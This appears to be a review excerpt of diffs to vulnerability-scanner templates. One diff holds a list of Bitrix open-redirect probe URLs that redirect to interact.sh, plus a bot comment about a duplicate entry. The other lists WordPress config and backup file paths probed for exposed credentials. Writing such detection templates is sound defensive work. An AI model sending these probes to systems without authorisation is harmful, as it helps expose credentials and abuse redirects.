- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh' paths:
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh' - '/bitrix/rk.php?goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh' - '/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh' - '/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh' - '/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh' - '/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh' - '/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh' - '/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' - '/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' - '/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/' - '/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/' - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/'
- '/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/'
stop-at-first-match: true stop-at-first-match: true
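Review bot: The payload list carries one entry twice: the two consecutive `/bitrix/redirect.php?event1=%D0%A1…&event2=&event3=download&goto=https://interact.sh` values are identical. The duplicate was already present in the old `path` list and the conversion copied it across unchanged. Whenever no earlier entry matches, the same request is sent twice to the target, which adds traffic without adding coverage. Dropping one of the two lines keeps the detection identical.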


@ -16,36 +16,39 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-config.php' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/.wp-config.php.swp' payloads:
- '{{BaseURL}}/wp-config-sample.php' paths:
- '{{BaseURL}}/wp-config.inc' - "/wp-config.php"
- '{{BaseURL}}/wp-config.old' - "/.wp-config.php.swp"
- '{{BaseURL}}/wp-config.txt' - "/wp-config-sample.php"
- '{{BaseURL}}/wp-config.php.txt' - "/wp-config.inc"
- '{{BaseURL}}/wp-config.php.bak' - "/wp-config.old"
- '{{BaseURL}}/wp-config.php.BAK' - "/wp-config.txt"
- '{{BaseURL}}/wp-config.php.old' - "/wp-config.php.txt"
- '{{BaseURL}}/wp-config.php.OLD' - "/wp-config.php.bak"
- '{{BaseURL}}/wp-config.php.dist' - "/wp-config.php.BAK"
- '{{BaseURL}}/wp-config.php.inc' - "/wp-config.php.old"
- '{{BaseURL}}/wp-config.php.swp' - "/wp-config.php.OLD"
- '{{BaseURL}}/wp-config.php.html' - "/wp-config.php.dist"
- '{{BaseURL}}/wp-config-backup.txt' - "/wp-config.php.inc"
- '{{BaseURL}}/wp-config.php.save' - "/wp-config.php.swp"
- '{{BaseURL}}/wp-config.php.SAVE' - "/wp-config.php.html"
- '{{BaseURL}}/wp-config.php~' - "/wp-config-backup.txt"
- '{{BaseURL}}/wp-config.php-backup' - "/wp-config.php.save"
- '{{BaseURL}}/wp-config.php.orig' - "/wp-config.php.SAVE"
- '{{BaseURL}}/wp-config.php_orig' - "/wp-config.php~"
- '{{BaseURL}}/wp-config.php.original' - "/wp-config.php-backup"
- '{{BaseURL}}/wp-config.backup' - "/wp-config.php.orig"
- '{{BaseURL}}/_wpeprivate/config.json' - "/wp-config.php_orig"
- '{{BaseURL}}/config.php.zip' - "/wp-config.php.original"
- '{{BaseURL}}/config.php.tar.gz' - "/wp-config.backup"
- '{{BaseURL}}/config.php.new' - "/_wpeprivate/config.json"
- '{{BaseURL}}/common/config.php.new' - "/config.php.zip"
- '{{BaseURL}}/wp-config.php.bk' - "/config.php.tar.gz"
- "/config.php.new"
- "/common/config.php.new"
- "/wp-config.php.bk"
stop-at-first-match: true stop-at-first-match: true